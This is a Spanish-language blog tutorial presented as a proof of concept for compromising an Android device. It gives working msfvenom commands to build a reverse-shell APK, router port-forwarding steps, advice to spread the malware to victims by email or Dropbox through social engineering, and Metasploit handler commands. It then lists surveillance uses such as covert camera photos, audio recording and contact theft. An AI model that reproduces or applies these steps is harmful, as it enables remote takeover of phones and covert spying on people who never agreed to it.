Autores: Juan Velasco y Diego Jurado
Hola hackers! Hoy os traemos una pequeña prueba de concepto de cómo un atacante podría acceder a nuestros datos y dispositivo Android. Para ello realizaremos las pruebas en una simulación mediante el uso de máquinas virtuales.
¡¡Vamos allá!!
Paso 1: Configuración de red
Comprobar conexiones entre los dispositivos
Como trabajaremos en local, puesto que se trata de una prueba de concepto, usaremos dos máquinas virtuales. Una con la distribución Kali Linux 2.0 y otra con una distribución de Android 4.4 que puedes encontrar aquí.
Una vez que tenemos las dos máquinas virtuales encendidas y en funcionamiento, tenemos que ponerlas en modo NAT. Es decir, en red local o interna.
Comprobamos que tenemos conexión entre ambas máquinas realizando un ping entre las dos direcciones IP. Para obtener la dirección IP de nuestro dispositivo Android tenemos que dirigirnos a “Ajustes → Acerca del teléfono → Estado”, teniendo una conexión activa a internet.
Configurar puertos del router
Configuramos puertos del router, abrimos por ejemplo el puerto 5555 y ponemos la interfaz de la máquina virtual que estamos usando, en nuestro caso Kali-Linux.
La máquina virtual Kali tiene la ip (192.168.1.53), tiene que estar en la misma subred que la máquina física desde la cual configuramos el router (192.168.1.33) y deberá estar en modo transparente (Modo Bridged).
Una vez configurados los puertos del router, y la red, procedemos a la creación del malware.
Paso 2: Creación del APK malicioso
Nos vamos a la máquina virtual de Kali Linux, abrimos terminal y ponemos el siguiente comando:
msfvenom -p android/meterpreter/reverse_tcp LHOST=direccion_ip LPORT=puerto R> apkmalicioso.apk
En nuestro caso:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=5555 R> apkmalicioso.apk
Nota: Deberemos poner en LHOST nuestra dirección ip de Kali Linux y en LPORT el puerto que hemos abierto en el router, en nuestro caso el 5555.
Ya tenemos nuestro apk malicioso creado, ahora es importantísimo darle permisos de ejecución desde las propiedades, ya que si no lo hacemos, el usuario no podrá ejecutar e instalar dicha apk.
Ahora toca distribuir nuestro malware vía email, Dropbox o cualquier herramienta de descargas. Ingeniería social.
Por otro lado, deberemos abrir metasploit framework y realizar el exploit para escuchar posibles conexiones de nuestras víctimas.
En este caso, lo que haremos será utilizar el exploit multi/handler y el payload reverse_tcp de android para escuchar conexiones ya que serán las víctimas las que se conecten a nosotros.
- use multi/handler
- set payload android/meterpreter/reverse_tcp
- set lhost direccion_ip_kali
- set lport 5555
- exploit –j (ponemos el –j para permitir más de una conexión y por tanto para poder abrir varias sesiones al mismo tiempo).
En cuanto la víctima descargue e instale la aplicación, obtendremos una sesión de meterpreter, como podemos ver en la imagen.
Paso 3: Jugando con meterpreter
Ya tenemos la sesión de meterpreter, por lo que tenemos acceso TOTAL al dispositivo móvil.
Es hora de empezar a jugar…
Esta es una lista de algunos comandos que podemos usar:
Podemos mostrar información sobre el sistema:
Listar todos los procesos abiertos:
Acceder a la shell del sistema para navegar por carpetas…
Mostrar las cámaras disponibles
Pudiendo tomar fotografías desde ambas cámaras (delantera y trasera)
Grabar sonidos o activar la webcam
Sacar un listado de contactos o últimas llamadas
Estos son algunos de los comandos que podemos realizar. Es importante saber que todos los archivos se van guardando el carpeta /root de kali linux...
Interesante herramienta...
ResponderEliminar